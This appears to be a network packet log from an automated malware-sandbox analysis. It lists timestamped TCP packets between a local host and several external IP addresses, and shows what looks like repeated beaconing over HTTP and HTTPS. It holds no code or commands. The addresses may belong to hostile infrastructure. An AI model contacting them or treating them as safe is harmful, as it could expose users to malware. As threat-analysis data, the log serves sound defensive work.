                                                            Oct 11, 2024 06:37:54.251231909 CEST5057180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:54.254220009 CEST8050570116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:54.256558895 CEST8050571116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:54.258959055 CEST5057180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:54.259085894 CEST5057180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:54.259109974 CEST5057180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:54.264517069 CEST8050571116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:54.264559031 CEST8050571116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:55.768132925 CEST8050571116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:55.768893003 CEST8050571116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:55.768968105 CEST5057180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:55.769026995 CEST5057180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:55.772492886 CEST5057380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:55.774260998 CEST8050571116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:55.777599096 CEST8050573116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:55.777698994 CEST5057380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:55.777796984 CEST5057380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:55.777796984 CEST5057380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:55.782942057 CEST8050573116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:55.783459902 CEST8050573116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:57.005718946 CEST8050573116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:57.008706093 CEST8050573116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:57.008913040 CEST5057380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:57.008996964 CEST5057380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:57.010603905 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.010699034 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.010823011 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.011092901 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.011116982 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.014138937 CEST8050573116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:57.634265900 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.634458065 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.635695934 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.635710955 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.636122942 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.642945051 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.687423944 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.852514029 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.852576017 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.852735996 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.852756977 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.899642944 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.940167904 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.940191031 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.940231085 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.940265894 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.940627098 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.940690041 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.941570044 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.941637039 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:57.942553997 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:57.942620039 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.028590918 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.028736115 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.029052973 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.029124975 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.030018091 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.030093908 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.030534029 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.030603886 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.031589985 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.031672955 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.032476902 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.032562017 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.032902956 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.032967091 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.098460913 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.098541975 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.117683887 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.117753983 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.118442059 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.118511915 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.119029045 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.119105101 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.119987965 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.120054960 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.120805025 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.120872974 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.121834040 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.121901035 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.122464895 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.122541904 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.123557091 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.123637915 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.123644114 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.123671055 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.123708010 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.123733997 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.124512911 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.124588966 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.125350952 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.125431061 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.126234055 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.126315117 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.187056065 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.187266111 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.206125021 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.206315994 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.206782103 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.206850052 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.207741976 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.207811117 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.208283901 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.208353043 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.208403111 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.208461046 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.208483934 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.208518028 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.208530903 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.208558083 CEST50575443192.168.2.423.145.40.164
                                                            Oct 11, 2024 06:37:58.208564997 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.208587885 CEST4435057523.145.40.164192.168.2.4
                                                            Oct 11, 2024 06:37:58.771692991 CEST5058180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:58.776604891 CEST8050581116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:58.776696920 CEST5058180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:58.776828051 CEST5058180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:58.776828051 CEST5058180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:58.781800032 CEST8050581116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:58.781807899 CEST8050581116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:00.041280031 CEST8050581116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:00.041382074 CEST8050581116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:00.041548967 CEST5058180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:00.041548967 CEST5058180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:00.045056105 CEST5059280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:00.047127008 CEST8050581116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:00.051393032 CEST8050592116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:00.051461935 CEST5059280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:00.051572084 CEST5059280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:00.051572084 CEST5059280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:00.056654930 CEST8050592116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:00.057559967 CEST8050592116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:01.303699017 CEST8050592116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:01.303762913 CEST8050592116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:01.304384947 CEST5059280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:01.310750008 CEST5059280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:01.315589905 CEST8050592116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:01.347964048 CEST5059880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:01.352771044 CEST8050598116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:01.352844000 CEST5059880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:01.353420019 CEST5059880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:01.353645086 CEST5059880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:01.358424902 CEST8050598116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:01.358467102 CEST8050598116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:02.601669073 CEST8050598116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:02.605293036 CEST8050598116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:02.605345011 CEST5059880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:02.605416059 CEST5059880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:02.610383987 CEST8050598116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:02.614419937 CEST5060980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:02.619422913 CEST8050609116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:02.619498014 CEST5060980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:02.619596958 CEST5060980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:02.619611025 CEST5060980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:02.624492884 CEST8050609116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:02.624686003 CEST8050609116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:03.860030890 CEST8050609116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:03.860435963 CEST8050609116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:03.860532045 CEST5060980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:03.863010883 CEST5060980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:03.867820024 CEST8050609116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:04.115765095 CEST5061580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:04.120974064 CEST8050615116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:04.121053934 CEST5061580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:04.121186972 CEST5061580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:04.121220112 CEST5061580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:04.126439095 CEST8050615116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:04.126470089 CEST8050615116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:05.389015913 CEST8050615116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:05.389090061 CEST8050615116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:05.389156103 CEST5061580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:05.389230013 CEST5061580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:05.391166925 CEST5062680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:05.391706944 CEST8050615116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:05.391858101 CEST5061580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:05.394346952 CEST8050615116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:05.398776054 CEST8050626116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:05.398847103 CEST5062680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:05.398963928 CEST5062680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:05.398978949 CEST5062680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:05.404403925 CEST8050626116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:05.404445887 CEST8050626116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:06.632905960 CEST8050626116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:06.632951975 CEST8050626116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:06.633083105 CEST5062680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:06.633268118 CEST5062680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:06.638308048 CEST8050626116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:06.690871954 CEST5063680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:06.696376085 CEST8050636116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:06.698951960 CEST5063680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:06.721301079 CEST5063680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:06.724843025 CEST5063680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:06.726895094 CEST8050636116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:06.730436087 CEST8050636116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:07.949136019 CEST8050636116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:07.949237108 CEST8050636116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:07.949301958 CEST5063680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:07.949423075 CEST5063680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:07.953970909 CEST5064380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:07.954272985 CEST8050636116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:07.958858967 CEST8050643116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:07.958945990 CEST5064380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:07.959048033 CEST5064380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:07.959081888 CEST5064380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:07.966917038 CEST8050643116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:07.967021942 CEST8050643116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:09.232206106 CEST8050643116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:09.233320951 CEST8050643116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:09.233414888 CEST5064380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:09.233464956 CEST5064380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:09.235726118 CEST5065480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:09.238487959 CEST8050643116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:09.241317034 CEST8050654116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:09.241405010 CEST5065480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:09.241578102 CEST5065480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:09.241612911 CEST5065480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:09.246623039 CEST8050654116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:09.246651888 CEST8050654116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:10.504018068 CEST8050654116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:10.505822897 CEST8050654116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:10.505968094 CEST5065480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:10.505968094 CEST5065480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:10.508598089 CEST5066480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:10.510869980 CEST8050654116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:10.513475895 CEST8050664116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:10.513535023 CEST5066480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:10.513645887 CEST5066480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:10.513672113 CEST5066480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:10.518469095 CEST8050664116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:10.519105911 CEST8050664116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:12.056718111 CEST8050664116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:12.057830095 CEST8050664116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:38:12.057885885 CEST5066480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:12.058012009 CEST5066480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:38:12.062980890 CEST8050664116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:20.248389959 CEST5085080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:20.253515005 CEST8050850116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:20.253611088 CEST5085080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:20.253727913 CEST5085080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:20.253737926 CEST5085080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:20.258757114 CEST8050850116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:20.258785963 CEST8050850116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:21.575018883 CEST8050850116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:21.577886105 CEST8050850116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:21.577977896 CEST5085080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:21.578025103 CEST5085080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:21.584758043 CEST8050850116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:27.302784920 CEST5085180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:27.307620049 CEST8050851116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:27.307697058 CEST5085180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:27.307861090 CEST5085180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:27.307879925 CEST5085180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:27.312803030 CEST8050851116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:27.313008070 CEST8050851116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:28.713341951 CEST8050851116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:28.718380928 CEST8050851116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:28.718450069 CEST5085180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:28.718489885 CEST5085180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:28.723320961 CEST8050851116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:35.066112041 CEST5085280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:35.070965052 CEST8050852116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:35.071059942 CEST5085280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:35.071202993 CEST5085280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:35.071230888 CEST5085280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:35.076014042 CEST8050852116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:35.076159954 CEST8050852116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:36.315859079 CEST8050852116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:36.316833973 CEST8050852116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:36.316984892 CEST5085280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:36.316984892 CEST5085280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:36.321995020 CEST8050852116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:43.727514029 CEST5085380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:43.732470036 CEST8050853116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:43.732564926 CEST5085380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:43.732719898 CEST5085380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:43.732743979 CEST5085380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:43.737466097 CEST8050853116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:43.737598896 CEST8050853116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:44.998517036 CEST8050853116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:44.999238014 CEST8050853116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:44.999341011 CEST5085380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:44.999341011 CEST5085380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:45.004489899 CEST8050853116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:54.196448088 CEST5085480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:54.201297998 CEST8050854116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:54.201453924 CEST5085480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:54.201596022 CEST5085480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:54.201617956 CEST5085480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:54.206414938 CEST8050854116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:54.206651926 CEST8050854116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:55.430552006 CEST8050854116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:55.431031942 CEST8050854116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:39:55.431116104 CEST5085480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:55.431153059 CEST5085480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:39:55.435930014 CEST8050854116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:40:07.583535910 CEST5085580192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:07.588501930 CEST8050855186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:07.588598967 CEST5085580192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:07.588702917 CEST5085580192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:07.588721991 CEST5085580192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:07.593848944 CEST8050855186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:07.593878031 CEST8050855186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:08.776712894 CEST8050855186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:08.776763916 CEST8050855186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:08.776917934 CEST5085580192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:08.776957989 CEST5085580192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:08.781857014 CEST8050855186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:20.395510912 CEST5085680192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:20.400554895 CEST8050856186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:20.400655985 CEST5085680192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:20.400799036 CEST5085680192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:20.400823116 CEST5085680192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:20.405628920 CEST8050856186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:20.405764103 CEST8050856186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:21.583488941 CEST8050856186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:21.583538055 CEST8050856186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:21.583692074 CEST5085680192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:21.583805084 CEST5085680192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:21.588613033 CEST8050856186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:33.584899902 CEST5085780192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:33.589828014 CEST8050857186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:33.589977026 CEST5085780192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:33.590082884 CEST5085780192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:33.594906092 CEST8050857186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:33.594959021 CEST5085780192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:33.599773884 CEST8050857186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:34.773993969 CEST8050857186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:34.775688887 CEST8050857186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:34.775789976 CEST5085780192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:34.775902987 CEST5085780192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:34.780730963 CEST8050857186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:46.043612003 CEST5085880192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:46.048630953 CEST8050858186.233.231.45192.168.2.4
                                                            Oct 11, 2024 06:40:46.048737049 CEST5085880192.168.2.4186.233.231.45
                                                            Oct 11, 2024 06:40:46.048886061 CEST5085880192.168.2.4186.233.231.45
